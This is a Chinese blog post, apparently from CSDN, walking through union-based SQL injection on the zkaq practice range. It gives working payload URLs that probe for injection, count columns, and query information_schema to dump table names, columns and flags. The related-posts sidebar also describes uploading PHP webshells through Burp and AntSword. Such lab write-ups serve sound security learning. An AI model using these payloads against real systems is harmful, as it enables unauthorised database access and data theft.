SQL注入(显错注入)---zkaq

已于 2022-04-21 23:39:54 修改
阅读量998 收藏 1
点赞数
分类专栏: WEB安全---zkaq靶场 文章标签: web安全
于 2022-04-02 22:03:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_38237216/article/details/123930034
版权

一.概念

  1. sql注入本质:将用户的输入拼接到代码中,并被当做sql语句执行
  2. sql注入的条件:用户可控输入和原本程序要执行代码,拼接用户输入且当作SQL语句去执行
  3. SQL显错注入基本流程:

  • 判断是否存在注入点

  • 判断字段数

  • 判断显错位

  • 判断库名、表名、列名

  • 寻找具体数据

二.靶场

1.pass-01—显错注入(一)

  • 判断是否存在sql注入:使用 and 1=1 和 and 1=2测试

  • 判断查询字段数,使用order by

    当字段数为3的时候,查询有结果,当字段数为4的时候,查询没有结果,说明字段数是3

  • 联合查询查询数据库名:http://inject2b.lab.aqlab.cn/Pass-01/index.php?id=2 union select 1,2,database()

    发现数据库名为error

  • 查询表名:

    http://inject2b.lab.aqlab.cn/Pass-01/index.php?id=2%20union%20select%201,2,table_name%20from%20information_schema.tables%20where%20table_schema%20=%27error%27%20limit%202,1

    查到数据库error中存在error_flag和user两张表

  • 先查找error_flag表的内容

    发现存在Id、flag两个列名

http://inject2b.lab.aqlab.cn/Pass-01/index.php?id=1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='error_flag'

查找error_flag表内容

http://inject2b.lab.aqlab.cn/Pass-01/index.php?id=1%20and%201=2%20union%20select%201,(select%20group_concat(id,flag)%20from%20error.error_flag),3

得到flag zKaQ-Nf zKaQ-BJY zKaQ-XiaoFang zKaq-98K

pass2-pass4同pass1一样,只是传参不一样

pass-2:id=1’ union select 1,2,database() — qwe’
pass-3:id=1’) union select 1,2,database() — qwe’
pass-4:id=1”) union select 1,2,database() — qwe’

real_plot
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入-显错注入
qq_46416934的博客
05-17 667
目录 SQL注入 数据库语句 流程 靶场演示 万能密码漏洞? 万能密码字典 SQL注入 什么是SQL注入 : 用户输入的内容被浏览器当做数据库语句进行执行。 关键点:我们一定要输入**[数据库语句]** 。 我们输入**【数据库语句】,如果这个[网站执行了]**,就说明这个网站,存在数据库注入漏洞。 数据库语句 select 列名 from 表名 where 条件 select 查询 from 来自 where 当···条件成立的时候 流程 第一步:判断网站是否存在漏洞 and 1=1 --> 条件
SQL注入技巧之显注与盲注中过滤逗号绕过详析
09-09
SQL注入的绕过技巧有很多,下面这篇文章主要给大家介绍了关于SQL注入技巧之显注与盲注中过滤逗号绕过的相关资料,文中通过示例代码介绍的非常详细,需要的朋友们下面随着小编来一起学习学习吧
SQL注入1——显注(重学)
qq_52263650的博客
11-01 1018
SQL注入,大一学的了,摆了这么久,在学一遍吧
SQL注入——报错型注入
qq_41554179的博客
03-12 584
报错型sql注入 报错型sql注入上述sql注入的前三步是一致的,但没有数据的回显位,也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果sql语句出现错误则可以显示在页面上,我们可以利用这点来构造报错显示sql语句。下边是利用count(*), FLOOR(RAND(0)*2,group by报错。 语句: - AND(SELECT 1 FROM (SELECT COUNT(*...
详解 SQL注入(盲注)
m0_46397814的博客
08-03 714
0x01 SQL注入漏洞的分类 根据不同的标准,SQL注入漏洞可以有不同的分类。 根据数字类型分类,SQL注入分为两大基本类型。 数字型拼接到SQL语句中的参数,是以数字出现的,即引号两边没有单双引号。 字符型拼接到SQL语句中的参数,是以文本出现的,即引号两边有单双引号。 注入手法 联合查询(Union Query SQL Injection) 报错注⼊(Error-Based SQL Injection) 布尔盲注(Boolean-based Blind SQL Injection) 延时注⼊(Tim
sqIi-labs,SQL注入平台
08-06
sqIi-labs:是一款学习SQL注入的开源平台,共有75种不同类型的注入 解压密码:ms08067.com sqIi-labs的使用文章见:https://blog.csdn.net/qq_41453285/article/details/100827739
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
SQL注入--显错注入
weixin_48803011的博客
12-14 668
显错注入就是通过sql注入再利用网页的显示位进行数据的读取
sql注入-显错注入
qq_43754351的博客
05-10 948
显错注入手工注入方法及sqlmap方法
显错注入(Pass-01、Pass-02、Pass-03、Pass-04)
秋风浮水的博客
04-06 366
靶场:传送门 验证是否可以“sql注入” select * from user where id=1 or 1=1 获取返回字段的数量 select * from user where id=1 union select 1,2,3 order by 2 获取数据库名称以及版本号 select *from user where id=1 union select 1,database(),version() order by 2 获取数据库表名称 select *from use
upload-labs Pass-01(详解)
菜菜的博客
09-26 445
思路:发现了只能上传图片类型,我们可以使用burp来修改前端,来上传php一句话木马,或者在burp里上传的图片的文件后添加一句话木马。打开蚁剑,输入url地址http://192.168.7.56:1111/upload/7.php 输入一句话密码cmd,点击测试连接,点击添加。发现前端限制了我们只能上传.jpg .png .gif类型的文件。burp就会显示,下面很长而且看不懂的就是图片文件的内容。打开burp,打开抓包,浏览器先上传一张图片。就上传成功了,右键图片点击新建标签打开图像。
PASS-01(前端js绕过)
最新发布
2302_80482140的博客
11-16 135
4.返回后,右击文件下面的图片,选择"在新标签页中打开图片",之后会发现空白,且网址后缀为php所以我们的木马已经成功上传到网站的服务器上。打开后右键添加数据将刚开始打开的空白网址的网址复制上去,填写密码,双击打开后进入服务器目录(可以进行操控访问修改下载等功能)前言:前端通过js代码对我们上传文件的合法性进行一定的验证,本题主要是通过绕过js来完成不一致文件格式的上传。解决方法·,打开右上角三个点,点开设置找到禁用js代码(如下),使js无法过滤我们的不合法法文件。这就是一种绕过方法,
Pass-01
m0_62094846的博客
11-05 142
这一种是属于javascript 只允许上传jpg,png,gif,如果要用php,要修改限制 打开开发者工具,把限制文件传入的代码删除,就可以上传带有木马的php文件了 打开页面是空白的,php中的代码已经被读取了,用蚁剑就可以获得数据 ...
upload_libs通关教程
qq_48904485的博客
03-22 1511
Pass-01-js检查 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sSMtARtv-1647921872435)(C:\Users\23850\AppData\Roaming\Typora\typora-user-images\image-20211104093754400.png)] 只能上传jpg|png|gif js验证 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KCgLniJs-1647921872436)(C:\Users\
文件上传(靶场:upload-labs)学习笔记
weixin_41182861的博客
04-20 893
Pass-01 Pass-01 Pass-01 Pass-01
upload-labs通关(Pass01-Pass05)
m0_46467017的博客
08-15 1661
我们在数据包中把后缀名改为.php. .,首先他发现有一个点,这时会把他去掉,又发现有一个空格,也会把它去掉,我们这时还有一个点,也就是.php. 由于他只是验证一次,所以不会在去掉我们的点。我们在数据包中把后缀名改为.php. .,首先他发现有一个点,这时会把他去掉,又发现有一个空格,也会把它去掉,我们这时还有一个点,也就是.php. 由于他只是验证一次,所以不会在去掉我们的点。本关也有两种绕过方法:第一种是上传php文件,改Content-Type,第二种是上次合法后缀文件,改文件改后缀。...
查询新闻明细表〈news_detail),要求在新闻列表页面展现新闻数据,每页显示5条数据〈pageSize=5),前台提供参数∶页码(pageNo),请补全下面分页sql语句()。注∶使用MySQL数据库。
06-07
假设新闻明细表的结构如下: | id | title | content | create_time | | -- | ----- | ------- | ----------- | 则查询新闻明细表并进行分页的 SQL 语句如下: ``` SELECT id, title, content, create_time FROM news_detail ORDER BY create_time DESC LIMIT 5 OFFSET 5*(pageNo-1); ``` 其中 `LIMIT 5` 表示每页显示 5 条数据,`OFFSET 5*(pageNo-1)` 表示从第 `(pageNo-1)*5+1` 条数据开始取,即跳过前 `(pageNo-1)*5` 条数据。如果要查询第二页的数据,即 `pageNo=2`,则应该将 `OFFSET` 设为 `5`,表示跳过前 5 条数据,从第 6 条数据开始取。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值